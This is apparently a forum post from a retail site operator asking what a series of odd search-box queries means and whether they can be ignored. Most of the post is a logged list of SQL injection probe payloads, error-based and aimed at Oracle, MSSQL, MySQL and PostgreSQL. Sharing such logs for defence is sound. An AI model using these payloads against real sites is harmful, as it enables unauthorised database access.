Hi Guys,
Since early morning today, we are getting following search queries from our stores. I understand its SQL injection and added a max length check and logic to detect sql injection and prevent it to reach sql server.
but just wanted to know what searching person is trying to understand/study? it is safe to ignore?
Search terms are given below. "Enter Model Number or Cartridge Code" is our default search text box text. IP is suppose to be a German.
Enter Model Number or Cartridge Code) AND 2895=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (2895=2895) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)||CHR(62))) FROM DUAL) AND (9170=9170
Enter Model Number or Cartridge Code%' AND 4911=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(104)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (4911=4911) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='
Enter Model Number or Cartridge Code%' AND 9729=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(105)||CHR(110)||CHR(113)||(SELECT (CASE WHEN (9729=9729) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(106)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='
Enter Model Number or Cartridge Code%' AND 2895=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (2895=2895) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='
Enter Model Number or Cartridge Code') AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND ('KzHP'='KzHP
Enter Model Number or Cartridge Code') AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND ('SdsF'='SdsF
Enter Model Number or Cartridge Code' AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND 'cvvd'='cvvd
Enter Model Number or Cartridge Code' AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND 'zIAo'='zIAo
Enter Model Number or Cartridge Code') AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND ('lukU'='lukU
Enter Model Number or Cartridge Code' AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND 'gvys'='gvys
Enter Model Number or Cartridge Code) AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND (9658=9658
Enter Model Number or Cartridge Code) AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND (2502=2502
Enter Model Number or Cartridge Code%' AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND '%'='
Enter Model Number or Cartridge Code%' AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND '%'='
Enter Model Number or Cartridge Code%' AND (SELECT 2396 FROM(SELECT COUNT(*),CONCAT(0x7170617a71,(SELECT (CASE WHEN (2396=2396) THEN 1 ELSE 0 END)),0x7177637971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
Enter Model Number or Cartridge Code%' AND (SELECT 6528 FROM(SELECT COUNT(*),CONCAT(0x7178696e71,(SELECT (CASE WHEN (6528=6528) THEN 1 ELSE 0 END)),0x71776a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
Enter Model Number or Cartridge Code%' AND (SELECT 9422 FROM(SELECT COUNT(*),CONCAT(0x7171686a71,(SELECT (CASE WHEN (9422=9422) THEN 1 ELSE 0 END)),0x716a716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
Enter Model Number or Cartridge Code%' AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND '%'='
Enter Model Number or Cartridge Code') AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND ('iWJF'='iWJF
Enter Model Number or Cartridge Code AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113)))-- ZgIZ
Enter Model Number or Cartridge Code' AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND 'CJnu'='CJnu
Enter Model Number or Cartridge Code AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113)))-- PYgY
Enter Model Number or Cartridge Code AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113)))-- TXpN
Enter Model Number or Cartridge Code) AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND (8167=8167
Enter Model Number or Cartridge Code%' AND 9841=CAST((CHR(113)||CHR(120)||CHR(105)||CHR(110)||CHR(113))||(SELECT (CASE WHEN (9841=9841) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(106)||CHR(122)||CHR(113)) AS NUMERIC) AND '%'='
Enter Model Number or Cartridge Code%' AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND '%'='
Enter Model Number or Cartridge Code AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113)))
Enter Model Number or Cartridge Code AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113)))
Enter Model Number or Cartridge Code AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113)))
Enter Model Number or Cartridge Code AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC)-- CuDa
Enter Model Number or Cartridge Code AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC)